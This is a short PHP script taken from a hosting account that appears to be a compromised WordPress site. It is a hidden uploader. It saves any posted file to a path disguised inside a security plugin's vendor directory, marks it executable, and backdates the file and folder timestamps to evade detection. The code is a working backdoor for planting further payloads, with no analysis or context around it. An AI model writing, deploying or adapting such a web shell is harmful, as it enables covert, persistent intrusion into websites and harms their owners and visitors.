/home/ramtczxy/.cagefs/tmp/.partition
<?php   $p = "/home/ramtczxy/acedisposables.com//home/ramtczxy/emilypoultryfarm.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/edit_link2"; $ft = 1756441761; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) {     $filesize = filesize($p);     if ($filesize >= 5448) {         @chmod($p, 0744);         if ($ft) {             @touch($p, $ft, $ft);             @touch(@dirname($p), $ft, $ft);         }         die('_uploaded!_');     } else {         if (file_exists($p)) {             print "file exists but size = {$filesize} not 5448";         }         @unlink($p);     } } die('_upload_failed_');